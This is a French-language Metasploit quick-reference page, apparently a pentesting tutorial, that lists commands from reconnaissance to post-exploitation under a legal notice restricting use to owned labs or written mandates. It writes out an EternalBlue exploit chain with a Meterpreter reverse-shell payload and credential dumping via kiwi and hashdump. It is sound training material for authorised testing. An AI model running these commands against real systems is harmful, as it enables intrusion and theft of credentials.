Framework d'exploitation
Débuter avec Metasploit
Un coup d'œil, une commande, une explication pour tirer parti du framework le plus populaire des pentesters. Les commandes ci-dessous suivent le fil d'un engagement : de la reconnaissance à la post-exploitation.
Cadre légal & environnement de test
Les modules cités (EternalBlue, Mimikatz/kiwi, hashdump…) ne doivent être utilisés que dans un laboratoire vous appartenant (Metasploitable, VulnHub, machines HTB/labs) ou dans le cadre d'un mandat écrit. Toute exploitation non autorisée est pénalement répréhensible (art. 323-1 et suivants du Code pénal).
Le fil d'un engagement
🧱 Notions clés
ExploitBloc de code qui profite d'une vulnérabilité précise pour exécuter une action sur la cible.
PayloadCharge utile livrée après l'exploit, souvent un shell Meterpreter ou un script personnalisé.
Module auxiliaireOutil non intrusif (scanner, brute force, enumeration) qui prépare ou étaye l'exploitation.
Post moduleAction de post-exploitation pour collecter des preuves, pivoter ou élever les privilèges.
SessionCanal ouvert avec la machine compromise pour lancer d'autres commandes.
🚀 Mise en route
msfconsoleLance l'interface interactive principale du framework.
msfupdateSynchronise les modules et payloads avec la dernière base.
msfdb initInitialise la base de données PostgreSQL pour stocker les résultats.
workspace -a audit_reseauCrée un espace de travail isolé pour vos cibles.
versionAffiche la version de Metasploit et des dépendances chargées.
help searchRappelle la syntaxe de la commande de recherche directement dans la console.
🔎 Recherche & ciblage
search type:exploit smbFiltre les exploits SMB disponibles pour un périmètre Windows.
search platform:linux auxiliary scannerListe les scanners auxiliaires utiles aux hôtes Linux.
info exploit/windows/smb/ms17_010_eternalblueAffiche en détail les options et références d'un module.
use auxiliary/scanner/portscan/tcpCharge un scanner TCP intégré pour cartographier les ports.
set RHOSTS 192.168.1.0/24Définit la cible ou plage de cibles pour le module actif.
runExécute immédiatement le module chargé avec les options courantes.
🛠️ Préparation des exploits
use exploit/windows/smb/ms17_010_psexecCharge l'exploit EternalBlue avec élévation via PsExec.
set PAYLOAD windows/x64/meterpreter/reverse_tcpSélectionne un shell Meterpreter inverse approprié.
set LHOST 10.10.0.5Déclare l'adresse locale qui recevra la session retour.
set LPORT 4444Fixe le port d'écoute pour le payload configuré.
checkVérifie si la cible semble vulnérable avant le tir réel.
exploit -jDéclenche l'exploit en job pour libérer la console.
📡 Modules auxiliaires & scanners
use auxiliary/scanner/http/titleCollecte les titres HTTP pour repérer les interfaces exposées.
use auxiliary/scanner/ssh/ssh_versionIdentifie les versions SSH en service.
set THREADS 50Augmente le parallélisme pour accélérer un scan auxiliaire.
set VERBOSE trueAjoute des logs détaillés pendant l'exécution du module.
services -S httpFiltre les services découverts contenant « http » pour prioriser.
hosts -c address,os_nameAffiche un tableau condensé des hôtes connus et de leur OS.
🕵️ Post-exploitation & sessions
sessions -lListe les sessions actives collectées par vos exploits.
sessions -i 1Ouvre la session numéro 1 pour interagir avec la cible.
backgroundPlace la session courante en arrière-plan pour continuer ailleurs.
load kiwiCharge l'extension Mimikatz pour extraire des identifiants.
hashdumpRécupère les hachages NTLM via Meterpreter en un clic.
run post/windows/gather/enum_logged_on_usersÉnumère les comptes actifs sur la machine compromise.
⚙️ Automatisation & reporting
setg RPORT 445Définit une option globale appliquée à tous les modules.
spool logs/metasploit.logEnregistre tout ce qui s'affiche dans un fichier d'audit.
resource scripts/auto_exploit.rcJoue une séquence complète d'actions depuis un fichier RC.
makerc derniers_cmds.rcCrée un script RC reprenant vos dernières commandes utiles.
db_nmap -sV 10.10.0.0/24Intègre directement les résultats Nmap dans la base Metasploit.
services -o rapports/services.csvExporte la table des services en CSV pour vos livrables.
Pour aller plus loin